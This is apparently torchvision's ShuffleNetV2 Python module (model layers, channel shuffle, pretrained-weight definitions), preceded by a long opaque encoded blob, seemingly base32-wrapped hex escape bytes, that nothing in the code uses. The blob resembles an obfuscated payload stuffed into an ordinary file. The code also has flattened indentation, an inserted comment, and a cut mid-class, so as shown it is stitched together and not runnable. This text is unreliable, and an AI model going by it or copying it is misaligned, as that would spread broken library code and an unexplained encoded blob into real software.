JWLR4GEZS4PBSTSXDYMUZFY6BRMRXDI2K4PBSGIXDYG5TFY6DFMVOHQYZXLR4GMYSLLR4GMZS4PBTDARS4PBRGGXDYMUYG6XDYMM3FY6DEMJOHQZRTPBOHQYRVLR4DQYK4PBTGMXDYGA2FY6DGG5SDCXDYMRSVY6DFGVOHQYLBNFOHQYTDLR4DAMKPLR4GEYS4PBRDQXDYMIZFY6BYMIVVY6DCG4QVY6DGMVOHQODFH5MVY6DGMNOHQYTCNNOHQZJTLR4GINSYLR4GCYS4PA4WCPS4PBSWMXDYHBTFY6DGGZOHQZJTLJWVY6BRGZOHQZTGLR4GKYK4PBTDIXDYGFRFY6DGMNOHQYRUNVOFYXDYMFRFY6DDGMRXCXDYHA4VY6DEGZOHQYZULR4GIYTLLR4GGOC4PAYTIXDYG5TFY6DGMF5FY6BRMROHQODGLR4GKYS4PA4TEL2HLR4DCM2TLR4GKYSFPEQFY6BZMUQFY6DFGBOCOXDYMRSVY6DFGBOHQYLCLR4GGM24PA4TKXDYMY4FY6DBMROHQMLCLR4GGNR7HVSFY6BYMJOHQZJXLR4DQOC4PBRDOXDYMU3ECXDYMQ3VY6DDMFOHQYRQMZOHQOJYLR4GGNS4PBSDGXDYHA2UMXDYMVTFY6DDGBBFY6DDMVOHQODELR4GEZTOLR4DQYZGOVOHQYTDLR4GGOKCLR4GCYK4PBTDAZK4PA4DMXDYGFRH44S4PA4GIXDYMZSVY6DBGVOHQYLFLR4DSZS4PBRTO4ZULR4GKMJAIBPSUXDYGBSVY6DBMVNEUXDYGEZFY6DFMNOCOXDYMY4VY6BZMFOHQZRSLR4DCNDYLR4GMOC4PBSWKXDYG5TFY6DFGMSVY6BYHAYFAUK4LRYVQXDYMU4D4XDYMJSVY6DDGFOHQY3ELR4DCMC4PA4DMXDYMJQWSXDYMY2HGXDYMMYFY6BZMRYUKXDYGAZVSXDYHBQVY6BZMUVFY6DCGBOHQOBTLR4DSY24PBQTCXDYME3U6NTOL5OHQYLGPBOHQODCLR4DAYS4PA3WMXDYMYZFY6DCHFDFY6BXMZOHQYJQGREFY6DFG5OHQZRYLR4GEYS4PBQWI5K4PA4DSXDYHEYFY6DGGE3VY6DFMZOHQZRVOFOHQMLGLR4DCYS4PBTDIXDYGA3VY6BZGJAVY6DEMVOHQYTDLR4GIMC4PAYTGXDYMI2VY6DEGRVXANS4PBQWCXDYMEYFY6DGGFOHQYRXLR4GKN3KLR4GGNS4PBRGKXDYHAYXWXDYMUZVY6DEGFOHQYLFLR4GIMBFPVOHQYTDLR4GINTBLR4GGYS4PBQTQXDYMEZHM4C4PBRDANK4PA4T
M3KDLR4GKZTSLR4DSNZ2LR4GCY2PLR4GGZK4PA4TEXDYHEYFY6BYG5OHQZRRLR4GCYSOJ4UDWXDYMY3V6XDYMU4XUWC4PBSGEXDYMM2VY6BQMJOHQYRZLR4DSYS4PBSWMZ22LR4GCYK4PBRTSXDYMJTFY6DFG5OHQZDELR4GGZDIKROHET3VLR4GEN24PBRTAXDYGAZVY6DDMFAVY6DBGFOHQMLGLR4GIOC4PAYDEXDYMRSSMW24PBRTMXDYMNSFY6DCMEZC4YK4PA4DOK3XMFOHQYLFLR4GCMK4PBSWKXDYGBRE2XDYMJRG4T3PJZOHQYZXLR4GCZS4PBRTGXDYMQ3XQXDYME3VY6DEMZOHQYTGHNOHQMLELR4DCZC4PBRTKXDYMFRFY6DEMQQVY6DEMNOHQYJVLR4GCM24PBRGCXDOLR4GKY24PBTDAXDYMZRVY6DGMROHQZRQLR4DCN24PBRTEXDYGAYFY6BYMJOHQN3GLR4GEYS4PBQWKXDYHA3FY6DCGJQVY6BRMYXFY6BRMY7XQXDYMQ2VY6DCGBOHEXDYMM3VY6BZGR6VY6DEGBOHQZJTLR4DQM24PBTDCXDYHBTDYZ2MPBOHQMLFLR4GCNS4PBQTGXDSFQSFY6BYHFFVY6DCGROHQZRQLR4GKY3CLR4GENKCLR4GEOC4PBSWIX2EIFOHQODDLR4DQNS4PAYDMXDYGE3DAOK4PBQTKXDYMU4HIMLILR4GCOC4PBRWEV24PBSTCXDYGFSHCXDYMU2VMXDYMRSFY6DCMFOHQODCLR4DQZS4PAYWCXDYMFRVY6DEHBOHQOLEIFOHQZTGLR4GCM2RKROHQYJZIVOFYQK4PBSTCXDYMYYVY6DCG5OHQZLGLR4GCYTFIVIVY6DGMROHQMJYLR4GKNJBFJOHQYJWLR4GENK4PBTDOXDYMUZFY6BRGVOHQZDDGVMEMXDYMY4FY6DGMROHQYJTLZOHQZBRGZOHQZDDLR4GEOC4PA4DQXDYMZSVY6DFMNOHQMLBLR4DANC4PBSWC424PBSGIXDYMRQVY6DDGRKTEXDYMY4FY6DCGZOHQOLGLR4GKMJQJ5OHQZBUMNOHQMLBLR4GCYTSLR4GKNC4PAYTAXDYMIYH4XDYMI4FY6BYGNKVY6BQMVOHQZJRLR4DANRNLR4GMY24PAYWIIDDLR4DSZS4PAYWMXDYMYZVY6BRMNOHQMBTLR4DCNK4PBRGEXDYHA2VY6DCG4QFY6DEGBOHQZRSOFOHQYTDLR4GIYS4PBSWGXDYMFRWYIK4PBSTEXDYMJTFY6DDGRNVY6DCGNOHEXDYMI4DANSGLR4GGOC4PBRDQKS4PAYWCOS4PBSWEXDYMRSVY6DDGZOHQYJXLR4GKMRBMFOHQODGLR4GCNR6LR4GIZC4PBRTGMJPLR4GENS4PBTDAXDYGA2VY6DGMNOHQYLGKROHQYZXNFOHQZDBLR4GGZTSOJOHQZBVMVOHQMBVN5OHQOBXJRLDMXDYHBRSUXDYGBSVY6BRGJOHQYTCLR4DCZTBLR4DAY24PBRTQVSBLR4GGNK4PBRGKXDYMZRFY6BRHFOHQZLELR4GIY24PBSTEXDYGEYD4XDYG5TFY6DCGNOHQMJZN5OHQMJVLR4GIZC4PBRGKXDYMMYVY6BYG5OHQYJYLR4GGMDGLR4GEMCHKNOHQYZUMVOHQOLCLR4GMY2ULR4DSN24PAYGGXDYMRSCWXDYMI2WMXS4PA4GMXDYHBSVY6DCGZOHQZBVLR4GMM24PBRDCXDYMI4FY6DDGERVY6DGGA6VY6DGGFOHQOBVFBCG4VC4PBSWMXDYGFSCA3C4PBTDAXDYMY2SEXDYMZQWAW24PBQWCXDYMI3TKXDYMYYFY6BZMJXFY6BRGBOHQYTGLR4GENC4PBSDAXDYHBQVY6DEHFWFY6DEGVOHQZBTPVOHQYLFJZOHQOBRLR4GMYS4PAYDISDRLR4DCNTTLR4GEYK4NZOCOXDYME3FY6DDGZYFY6DEGROHQZLFLR4DCYS4PA4DEXDYMVRFY6BZGRQFY6BYGFOHQYLCNVOHQZRWLR4GKM24PBSTIXDYHA4VY6BZMERFY6DDGFUWGXDYMY3FY6BRMVOHQZJSLR4GEOLFLR4GCMC4PBRDSOTFKZOHQOLGNFYFY6BZMJBFY6BQGFOHQYZSLR4DQNDTLR4DQNK2LR4DQM24PAYTGXDYMQ3G6XDYGE2FY6DGMVBDGXDYME2FY6DFGFOHQMJTLR4DQNS4PBRGEQ24PAYDEQR7LR4DCOK4PAYWMXDYHE4FY6DEGZXFCXDYMRRFY6BYGNOHQMLGLR4DAOC4PA4GGXDYMUYVY6DFGZFVY6BYMROHQMDGLR4DAM24PBSTSXDYMYZVY6DGGNOHQYRXLR4GKM24PBRDQXDYMJTHOXDYGFQVY6DFHBWVKKS4NZ5FY6DBGNIVY6DEHFOHQYRULR4GIMC4PBTDEJJPLR4GGNBPJQ2VIMC4PBRWKXDYMNSFY6BRHE6FY6DCMJOHQOBULR4GEZK4NZOHQMJVEJKC6624PA4WMVLELR4DSOCILR4GINC4PA4TEXDYG5TFAXDYMI3VY6BRG4SEIXDYMFRVY6BZGROHQYLGLR4GEOC4PA4WIXDYMQZUK424PBQTIXDYGEYVY6DGG5OHQMBWLR4GMYS4PBRGMXDYMZRVY6DBGVOHQYRWJNOHQZTBLR4GEN24PBRTKTK5LR4GCOK4PBRTSXDYGE2EIXDYGEYFY6BZGVOHQOBYLR4DCNK4PBQTA4S4PBSTQXDYMFSVCS24PAYDAXDYMY3FY6DFGI3FY6BRGR7FY6DBHBOHQYRXLR4GENS4PBQWKXDYHA3SQ6C4PA4GMXDYMQ2VY6BYMNOHQYZWOBLFY6DDMNOHQZRULR4GKZK4PBSDMXDYMUZFY6DEGROFYXDYGBSVY6DGGJOHQYRUHM4FY6DFGVOHEXDYGA2FY6DDGJPFY6DGGRQF6XDYMMZGQXDYMY2VY6DBMF7FY3SOOVSVY5C4PBSGEXDYMFSTQXDYHAZS4XDYMJQVY6DCMZOHQOJZEVOHQYTEIZOHQMLDLR4DCYZCOQXVY6DEGVOHQOJRLRZFY6DEGNOG4XDYMI2FY6BYGJOHQZJXLR4DCMC4PBRWGXDYMQYVY5C4PA4TOXDYMY3HUXDYMJRFY6BZMFOHQYJTLR4DSYS4PBSWCXDYHBSVY6DDMFJFY6BYG47TIWS4PBQWIVK4PBSTKQC4E44F6XDYGE3FY6DCG5OHQY3FMFOHQOBVHZAVY6DEHBOHQOJWLR4GGZS4PBTDCYK4PBRWCLK4PBTDG3RKKFOHQMDCLR4GMMK4PBQWE6C4PBRWGXDYMNRVY6DBMJOHQZBWOEUCQXDYGEYGCXDYHA4HA4L6LR4DQODHLR4GINLSLR4GKMS4PBTDAXDYMI4SUXDYMFTFY6BRMJOHQZDDLR4GINK4PBTDAXDYGBSVY6DEHFOHQZRUO5SVY6BQGF4FY6BRGZOHQYRXIF2HQXDYGAYFY6BRGBOHQYZULR4GCN3MLR4DAM24PBSDS2TMLR4GINC
7LR4DSZDOFM4EAXDYMQYTQ62XLR4GGM24PBTGIXDYMZRXGXK4PAYWGXDYMFQVY6BQGVJVY6DFHFOHQZJYLR4GEZK4PA4TAJC4PBSWEXDYMFRFY6DEHBAFY6DCMFIF4LS4PBQWCXDYME3VY6DEMJFFY6DEGM6GEXDYMNTFY6BYG5OHQYZXLRXFY6DCMJOTQXDYMUZFY6BZGVOHQMBROZOHQOLFLRZHO5C4PBRDSOS4LRLUGXDYMMYFY6BZGFZVY6DBGE2V4XDYHEYUMXDYMJTFY6BZGUYD4XDYMQZGQXDYMM2F6XDYMFSVY6BYGQ7VY6BYGROHQZRRFNOHQZDDLR4DAOC4PBSTCXDYMRRFY6BQGNOHQYTGLR4GGMC4PBRWGKS4PBRGKXDYMYZUEXDYGAZVY6DCMZZVY6DBMJOHQOLBLR4DAY24PBRTGXDYMEYFY6DEGBOHQYJYGJOHQZTFF5OHQYRVLR4DQNK4PBSDQXDYMQ2FY6DBMJMHAXDYGA2VY6BZMM2VY6DEGROHQZTFLR4DQMS4PBTDSXDYMNSFCXDYMZQVY6DGMFMCCXDYGFRFY6DGGRAVY6DGMNOHQY3BI5OCO2S4NY6VY6BYGVOHQZBSLR4DCOC4PBSWGXDYHEYFY4RXLR4GEZS4PBSDAXDYMIYVY6DBGFOHQMJRNBOHQYZZLR4DSM2HEFOHQODGLR4GEYK4PBTDEL24PAYDIKC4PAYDQTB3LR4GIM24PBRTQXDYMMZT2XDYMJSXQXDYHBRFY6DFHBOHQZBZLR4GIN24PBRTQXDYHA3VY6DGGR4VY6DBMRQFY6BQGROHQYJXLRXFY6BYGNVVY6DGMJOHQYJSEVOHQZTBLR4DSY24PBTDSRC4PBQTONK4PBSTI4S4PBRTKXDYMMZFY6BRGROHQYRROY6FGXDYMM4FY6DDGFEVY6DDGROHQZBSLR4DSZLMI5OHQYRSN5OHQMDFLR4DQNC6KZOHQY3EMJOHQZDGIBVGO4K4PBQTOXDYMRRFY6DEGFOHQMDCLR4DQMC4PAYDCXDYMVTFY6DCG5DSG5LRLR4GMODGLR4GKYS4PBRDOXDYGEYFY6BQGQVVY6DCGBOHQYZXLR4DCZS4PAYTAXDYGBRVY6DDHBIW2MLHLR4DAMLYLR4GMZC4PBSGM4C4PBRDMXDYMRSTSXDYMY2FY6DGHFOHQMBTHFOHQMDDLFOHQMBTHQQFY6DEHBTT2RLELR4GIZS4PBRGIXDYMQZVY6DBHBOHQOBWGFBFY6DEHBJFY6DDGNOHQYTCLR4GGMKTHVOHQYJRLR4DCMLSLR4DQMC4PBTGIXDYMIZVY6DGMJOHQZLBGFOHQYJRPZOHQYZYKROHQOBTLR4GGNC4PA4WEZ24PBQWCPT4LR4GIM24PBSDMXDYHFTFY6DBGJOHQZLBLR4GCMSCLR4DSY2RLR4DSOK4PBSGEXDYMMYVY6DDGJ2FY6DBGJ4VKXDYMVSHQPC4PBSDK7K4PA4WCXDYMIYCMXDYMEZFY6DBMVOHQYLCLR4GGYS4PBRGCRS4PAYWIXDYMQZFY6BYGFOHQYTCGRDFY6DFGVOHQMBRGJOHQMJZLR4GEN24PBQWKXDYMI3FY6BYGVNHEXDYMM4VY6BQGBOHQYJTEVOHQYRYLR4GKMK4PBSDMXDUOZ4FY6DGG5YEE3JBLR4DSYS4PBSDIXDYMQ4VY6BRMFOHQZBZM5OHQZRZIVEXGXDYMIYFY6BRGNOHQOBVLR4DCYS4PA4TAWRBFE4FUXDYGAZVY6DBMROHQOJVMNOHQYZVLR4GMM2MFYQVY6DEHBOHQMBSLR4DSM24PA4TAXDYMYYFY6DEGJHFY6DGGROHQMLDLR4GGMS4PBTGKI24PBRWIXDYHE2VY6DBGZOHQYTGHZOHQZBVLR4DQMZALR4GGZC4PA4DK7C4PAYTOMC4PBQWGXDYMM4FY6DFGFOHQMJRLR4GKMK4PA4TSXDYMI4FUO24PAYDKXDYMRRVY6DBMVOHQOBSONOHQMBYLR4GMOC4PBRTGXDYMIZD4XDYHBRVY6DEGUQFSXDYMQ3VY6BZMJOHQMLCLR4DCZRJL5HFY6DEMNOHQY3FLR4GCMKHLR4GMZKGLR4GIMC4PBSDKXDYHA4VY6DGG5KXUMS4PBTDCXDYMZRFY6BZMNOHQODDLR4DSM24PBSDKXDYHAYVY6BZHAXCYQS4PA4GEUK6LR4DSM24PA4TCXDYHE3VY6DCMFNVY6DBMFOHQMJQLR4DSNBLLR4DAMS4PBRGCXDYMI4VY6DBGZKUAOC4PBTDMXDYHAYHEXDYGE2TEXDYGE2FY6BZGVBDWXDYMY4EWXDYMRSFY6BRGBUFY6DEHBOHQMBYLROFY6DGGQVHU424PBQTGXDYMIYCGYK4PA4DAXDYMYZVY6BRGVJT2MK4PBRGGO24PBRWMXDYGFSVY6DBMJOHQOBTLR4DQMC3LA5V4XDYHA2FY6DEMROHQZRTGBOHQOJVLR4GCNKPLR4DSOBYLR4DQNK4PBRTEWL4LR4DAM2ELR4DSMC4PBSTGXC4LR4GKNKGLR4DCZK4PBQWIXDYMQ4VY6BQGROHQMLGPJOHQYJSLR4DSMJPLR4DSMS4PAYTSXDYMY2V2XDYMU4FY6DCMFEVY6BRGBOHQZDCKROG4LBBLR4GIYSGFBSVY6DEGROHQYJQLR4DSNC4PAYTSXDYHBSVY6DGG5OHQMDGGQ2CKXDYMYYFY6DCMJOHQZRVLVOHQYZYLR4DQY24PBSDEXDYMM3DYXDYGAYVY6DBGIYE6XDULR4GEOK4PBSGET24PBSDS224PA4DKXDYMYYFUK24PBRDSXDYMIZVY6DDMNSFY6DCGJOHQYRTLR4DCNLJLR4DSNS4PBQTAXDYHA4V6XDYMNSCUKC4PAYGKI24PAYWKXDYHA3EWXDYGE2VY6BZGFOHQYLELR4GIYKLLR4DQMC4PBRTCXDYMI4VY6DCMFOHQYTDLR4DAYS4PBRWM4K4PBSDESTLLR4DAYS4PBSTGXDYMY2VY6DBHBIFY6BRGA2GMXDYMM4SYXDYHFRHMXDYGA2WUXDYGEZFY6DGGZOHQOJSLR4GGZC4PBSDI3SCOU5FY6DBMVJF6I24ORBVY6DEGZAFY6DBGBEFY6DBHFOHQMJQLR4GMNC4PBRDQXDYMMZFY6BZMROHQMDCKVOHQYJULR4DCY24OROHQZBXJNOHQZRVOBOHQOLGLR4GCMK4PAYTM3JXGROHQOBULR4GCMLOLROFY6BYGVOHQYZZLR4GKNK4PBSGEXDYMZSVY6BYGZMFY6BZG5OHQZDGLR4GINTELR4GINS4PA4DGTK4PA4GIXDYMFRTU7CXOZVFY6BZGVOHQYRRFF6VY6BQMUXVY6DCGBOHQZBVLR4DCNT4LR4GIZS4PBSGMZ24PAYDEXDYGFSXQXDYHE4FY6DGMZOHQOJULZOHQZBXLR4GCZC4PBQTSZ24PBSTKUS4PAYGKXRMLR4DSZTKGBOHQMBULR4GCZK4PAYDILKALR4GEOJCIFOHQZTCMFYVY6BRGVOHQYJXLR4GMZLVLR4GCOK4PB
QTST24PAYWGXDYHFRDSXDYGFSXMXDYMVTFY6BYMFOHQYRXLR4DSN2MO5OHQYZSLR4GMOC4PBRTSXDYGBRFY6DGGFOHQYRVLR4DSMS4PBTGEPRIIROHQY3FOROHQZJTLR4GKZRSKFOHQZBVGNOHQY3ELR4GIYTBGBTFY6BZGFITCXDYHFSVY6DBHEUFY6BQGNOHQZTDLR4GENRYH5OHQYJSK5OHQOJQLR4GENC4PBTGIXDYMJRSMXDYMI3GEMLJJBCVY6DFGFOHQMBTLFOHQYZWKAVVY6BZGVEVY6DEGZOHQZJRHZOHQZBSLR4GINBCONOHQOBVPBOHQZLGM5OHQZDELJOHQMJSLVOHQYZSLR4GCYR6NRTVY6BRHFOHQZDGLR4DQOK4PA4GMXDYMM4V4XDYMM4FY6DEG5OHQMJZPB4FY6DCHBOHQYLEHYQVY6BRGFGG6QTELR4DCYTTIB5FY6BRHFOHQOJULR4DQZJJLR4DCZJALR4DAZS4PBSTKXDYGA4FY6BRMZOHQZTDLR4GKOK4PBSWC5K4PBQWIIRNLR4DQYTYF5CVY6DEGM3WYMC4PBRGKXDYMEZVY6DFMJOHQYRULR4GGNK4PAYGMXDYMFQVY6DDMFOHQZTDJNOHQMBWLJOHQZLFIR6VY6BQGJPVY6BYHFOHQZTFGIZFY6BRGZOHQYLCLR4DCOKFLR4GKOC4PAYTQXDYME4FWXDYMI4FY6DBG4XFYJ24PBQTSXDYMIZVY6DDMZOHQY3BLR4GCZS4PAYDCXDYMI4FY6DCMNOHQZTDLR4GGMBDM55GIIK4PBRDOXDYGE4VY6DEMROHQYTCEA7EUXDYMVRVY6DGMVOHQOJYLR4GIN24PBSTSXDYMI4TAXDYGE4DW7K4PBQTCOC4PBSTGXDYMMZD6XDYMVQVY6DEMFOHQYJRHBOHQOBVLR4GKY24PBRTKXDYGA2XYXDYMEYVY6DBG5OHQMBRLRZFY6BYG5AHUQS4PBQWG6CWLR4GCN2CLR4DCMJTFZWFY6DEMYVVY6BZGBOHQYZTLR4GCNK4LROHQYLFNZWGSL3BLR4GMZC4PA4TMXDYHA3FY6BQHBOHQYRXLR4DCOC4PBQTEXDYMFSFY6DCGBOHQOJTPNOHQYLBLR4GENS4PA4DMXDUH5OHQYRTLR4DQN27LR4DQMC7LR4GGMS4PBRDM4SVLR4GCNLYLR4DCOK4PBQWCXDYMI4VY6DFMEWSUXDYMIZX4TJ4LR4GGOK4PBRTMXDYMI3TKXDYGFSFY6DDGNOHQOBVFVOHQN3GINYVY6DBMU5GMXDYHFQVY6DDGNOHQYRRLR4DAN24PBRWEXDYMM4UWXDYMFSCMXDYMI2GM4CCIURVY6DBMROHQOLCLR4GKMK4PAYGMXDYMU3FY6DGGFOHQZTBLR4GGM2QLR4DCMK4PAYGGXDYHA3UEXDYGFQTOXDYMNRVY6BZGZOHQYTFLR4DSYR3LR4GEN2VLR4DCMTRLR4GCMSLLR4GGNTPLR4DQZK4PAYDIL24PA4TOXDYMMYFGTS4PBTDS2C4PBQTSXDYMI3UE7S4PBQTIXDYHBSVY6BYGBOHQMLFLR4DQOBILR4GEMBDMROHQYRULR4GKY24PA4DO5C4PAYWC3JZLR4GKOL6JRGVY6DGMZOHQOJZLR4DAMK4PAYDG424PBRDM7S4PBRTIXDYMY4UCNS4PBSTC6KSLR4GGMS4PAYTS6TOLR4DSMK4PBRDEXDYMQZFY6DGMEZVY6DDHBOHQYRTLR4GMOK4PAYDC5S4PAYGMXDYMNTCAXDYMQYTKXDYHA3EG2TLLR4DSNC4PBRDEXDYMQ3FY6BYHF4GYXDYGE2FY6DFGFOHQMJTLR4DCOK4PBRGEXDYMNRFY6DDMROHQYJXLR4DQZC4PA4TIXDYHBRGMXDYMI3VY6DDMMVFY6BYGFOHQMJWLR4GIZK4PA4DMXDYGEYFY6BRGVOHQODELR4DSNJJKURCQU24PA4TEXDYMQ2XQXDYHBQXOXDSKJESAXDYMU4XGXDYMZTFY6BYG5LDGXDYHE3FY6DBGROHQZRYLR4GGYKFLR4GGYK4PBSDOXDYMJQVY6DCG5OHQMLGLR4GMY24PAYGETZTLR4DANC4PAYTQXDYMJQWAXDYHAYVY5C4PAYTOXDYHFQUGQS4PBRWEXDYMVSFY6DEMZEVY6DFGNNVY6DBMFOHQMLBLR4GCOC4PBRWIXDYMQ4HCQLZLR4GCYK4PBSTIXDYMQ3EOWC4PBSWKUC4PAYTINS4PBSDGO24PA4TC2S4PBQTA2C4PA4TCLC4PAYTGQS4PBRTEXDYHE2CUWJ2LR4GIM24PBSDQXDYHEZFY3S4PBRDOXDYMNTFY6DEMMRGIXDYGFRS2XDYGE3ECXDYHAYFY6BRMFOHQY3GPA3FY6DFMJOHQZRSGJOHQZBVLR4DSY2DLR4DCMS4PBTDOXDYMVQVY6BRMROHQYZYJF3FY6DGHFOHQZJUFN5T6XDYMUYCSXDYHA3DIXDYMNSFY6DFGVOHQZTGLR4DCMDCGJRFY6DCGUQFY6DFGMVVY6BZGZTDSOK4PA4TAXDYMYZFWXDYMQ3FY6DEGROHQMJQJF5FCXDYME4FY6DCMMWVY6DCGJOHQOBUFNOHQZBXLR4GKN24PBTDKX24PBSWEXDYGFSVY6BQMJOHQZJTHVOHQMBRHBOHQOLCLR4GCMK4PA4TEXDYGBRFY6DBHBNTGXDYMQYD6KRDLR4GCOC4OROHQZLDEFYVY6BZMROHQYTEIZOHQZRSGROHQZDGIZLVY6DEMRASARK4PBSGEXDYHEYHO6K4PBQTEXDYHA3VIXDYGA2E4VS4PBRDSXDYHE4FY6DDGNOHQYRSENOHQOJXG4USKN24PBSGCYS4PA4TENC4PAYGKKC4PBTDAXDYGBRUSXDYMY4VY6DCGJRFY6DCGJOHQZLBLZOHQZBTLR4GIM24PAYDIN24PBSWMXDYME4VY6DDGJOHQYJTN5OHQYJTMVOHQZBRLROFYJ24PBRDK2S4PAYTAXDYMJTDGXDYHFQTUXDYHEYHOXDYGBRVY6BYHBOHQZJXLR4DSNKKLQTX2TC4PBRGEXDYMM4EAXDYMFRFY6DEGRAGQKS4PBSDIQK4PBTGKXDYMQ4VAXDYGBREWXDYGBRFY6BYGZOHQYRVFNOHQYJQGROHQMBYOV5FY6BYGY5VY6BRMVBFY6DDMVOHQZBXIN4FY6DFMROHQZLBLR4GCZC4PBSGEU24PBTDMXDYMFQUUXDYMFSFY6BQMJGFY6DCGFOHQYJWLR4DAZK4PA4TQXDYHE2VY6DFG5OHQYZSGRHFY6DEMVOHQZTELR4DAMK4PBSWI3K4PBSTKXDOLR4DCZS4PBQTQXDYMJRVY6BQGFOHQYJQLR4GIZK4PBSWIYS4PBQWI3LYLR4DAYS4PBSGCXDYGA4FY6DEHFOHQYRQKQZCAXDYMYZFY6BRGFOHQMJXLR4DCYK4PBRWCXDYMFTFY6BRMVHFY6BQGNOHQMDDKZOHQMJZINOHQZRZGVOHQZBVLR4GENK4PA4DIXDYHFRVO4JFJROHQ
|
from functools import partial
from typing import Any, Callable, List, Optional
import torch
import torch.nn as nn
from torch import Tensor
from ..transforms._presets import ImageClassification
from ..utils import _log_api_usage_once
from ._api import register_model, Weights, WeightsEnum
from ._meta import _IMAGENET_CATEGORIES
from ._utils import _ovewrite_named_param, handle_legacy_interface
__all__ = [
"ShuffleNetV2",
"ShuffleNet_V2_X0_5_Weights",
"ShuffleNet_V2_X1_0_Weights",
"ShuffleNet_V2_X1_5_Weights",
"ShuffleNet_V2_X2_0_Weights",
"shufflenet_v2_x0_5",
"shufflenet_v2_x1_0",
"shufflenet_v2_x1_5",
"shufflenet_v2_x2_0",
]
def channel_shuffle(x: Tensor, groups: int) -> Tensor:
batchsize, num_channels, height, width = x.size()
channels_per_group = num_channels // groups
# reshape
x = x.view(batchsize, groups, channels_per_group, height, width)
x = torch.transpose(x, 1, 2).contiguous()
# flatten
x = x.view(batchsize, num_channels, height, width)
return x
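# Illustrative note (not in the original file): for an input with num_channels = 4 and
# groups = 2, channel_shuffle reorders the channels [0, 1, 2, 3] into [0, 2, 1, 3].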
class InvertedResidual(nn.Module):
def __init__(self, inp: int, oup: int, stride: int) -> None:
super().__init__()
if not (1 <= stride <= 3):
raise ValueError("illegal stride value")
self.stride = stride
branch_features = oup // 2
if (self.stride == 1) and (inp != branch_features << 1):
raise ValueError(
f"Invalid combination of stride {stride}, inp {inp} and oup {oup} values. If stride == 1 then inp should be equal to oup // 2 << 1."
)
if self.stride > 1:
self.branch1 = nn.Sequential(
self.depthwise_conv(inp, inp, kernel_size=3, stride=self.stride, padding=1),
nn.BatchNorm2d(inp),
nn.Conv2d(inp, branch_features, kernel_size=1, stride=1, padding=0, bias=False),
nn.BatchNorm2d(branch_features),
nn.ReLU(inplace=True),
)
else:
self.branch1 = nn.Sequential()
self.branch2 = nn.Sequential(
nn.Conv2d(
inp if (self.stride > 1) else branch_features,
branch_features,
kernel_size=1,
stride=1,
padding=0,
bias=False,
),
nn.BatchNorm2d(branch_features),
nn.ReLU(inplace=True),
self.depthwise_conv(branch_features, branch_features, kernel_size=3, stride=self.stride, padding=1),
nn.BatchNorm2d(branch_features),
nn.Conv2d(branch_features, branch_features, kernel_size=1, stride=1, padding=0, bias=False),
nn.BatchNorm2d(branch_features),
nn.ReLU(inplace=True),
)
@staticmethod
def depthwise_conv(
i: int, o: int, kernel_size: int, stride: int = 1, padding: int = 0, bias: bool = False
) -> nn.Conv2d:
return nn.Conv2d(i, o, kernel_size, stride, padding, bias=bias, groups=i)
def forward(self, x: Tensor) -> Tensor:
if self.stride == 1:
x1, x2 = x.chunk(2, dim=1)
out = torch.cat((x1, self.branch2(x2)), dim=1)
else:
out = torch.cat((self.branch1(x), self.branch2(x)), dim=1)
out = channel_shuffle(out, 2)
return out
class ShuffleNetV2(nn.Module):
def __init__(
self,
stages_repeats: List[int],
stages_out_channels: List[int],
num_classes: int = 1000,
inverted_residual: Callable[..., nn.Module] = InvertedResidual,
) -> None:
super().__init__()
_log_api_usage_once(self)
if len(stages_repeats) != 3:
raise ValueError("expected stages_repeats as list of 3 positive ints")
if len(stages_out_channels) != 5:
raise ValueError("expected stages_out_channels as list of 5 positive ints")
self._stage_out_channels = stages_out_channels
input_channels = 3
output_channels = self._stage_out_channels[0]
self.conv1 = nn.Sequential(
nn.Conv2d(input_channels, output_channels, 3, 2, 1, bias=False),
nn.BatchNorm2d(output_channels),
nn.ReLU(inplace=True),
)
input_channels = output_channels
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
# Static annotations for mypy
self.stage2: nn.Sequential
self.stage3: nn.Sequential
self.stage4: nn.Sequential
stage_names = [f"stage{i}" for i in [2, 3, 4]]
for name, repeats, output_channels in zip(stage_names, stages_repeats, self._stage_out_channels[1:]):
seq = [inverted_residual(input_channels, output_channels, 2)]
for i in range(repeats - 1):
seq.append(inverted_residual(output_channels, output_channels, 1))
setattr(self, name, nn.Sequential(*seq))
input_channels = output_channels
output_channels = self._stage_out_channels[-1]
self.conv5 = nn.Sequential(
nn.Conv2d(input_channels, output_channels, 1, 1, 0, bias=False),
nn.BatchNorm2d(output_channels),
nn.ReLU(inplace=True),
)
self.fc = nn.Linear(output_channels, num_classes)
def _forward_impl(self, x: Tensor) -> Tensor:
# See note [TorchScript super()]
x = self.conv1(x)
x = self.maxpool(x)
x = self.stage2(x)
x = self.stage3(x)
x = self.stage4(x)
x = self.conv5(x)
x = x.mean([2, 3]) # globalpool
x = self.fc(x)
return x
def forward(self, x: Tensor) -> Tensor:
return self._forward_impl(x)
def _shufflenetv2(
weights: Optional[WeightsEnum],
progress: bool,
*args: Any,
**kwargs: Any,
) -> ShuffleNetV2:
if weights is not None:
_ovewrite_named_param(kwargs, "num_classes", len(weights.meta["categories"]))
model = ShuffleNetV2(*args, **kwargs)
if weights is not None:
model.load_state_dict(weights.get_state_dict(progress=progress, check_hash=True))
return model
_COMMON_META = {
"min_size": (1, 1),
"categories": _IMAGENET_CATEGORIES,
"recipe": "https://github.com/ericsun99/Shufflenet-v2-Pytorch",
}
class ShuffleNet_V2_X0_5_Weights(WeightsEnum):
IMAGENET1K_V1 = Weights(
# Weights ported from https://github.com/ericsun99/Shufflenet-v2-Pytorch
url="https://download.pytorch.org/models/shufflenetv2_x0.5-f707e7126e.pth",
transforms=partial(ImageClassification, crop_size=224),
meta={
**_COMMON_META,
"num_params": 1366792,
"_metrics": {
"ImageNet-1K": {
"acc@1": 60.552,
"acc@5": 81.746,
}
},
"_ops": 0.04,
"_file_size": 5.282,
"_docs": """These weights were trained from scratch to reproduce closely the results of the paper.""",
},
)
DEFAULT = IMAGENET1K_V1
class ShuffleNet_V2_X1_0_Weights(WeightsEnum):
IMAGENET1K_V1 = Weights(
# Weights ported from https://github.com/ericsun99/Shufflenet-v2-Pytorch
url="https://download.pytorch.org/models/shufflenetv2_x1-5666bf0f80.pth",
transforms=partial(ImageClassification, crop_size=224),
meta={
**_COMMON_META,
"num_params": 2278604,
"_metrics": {
"ImageNet-1K": {
"acc@1": 69.362,
"acc@5": 88.316,
}
},
"_ops": 0.145,
"_file_size": 8.791,
"_docs": """These weights were trained from scratch to reproduce closely the results of the paper.""",
},
)
DEFAULT = IMAGENET1K_V1
class ShuffleNet_V2_X1_5_Weights(WeightsEnum):
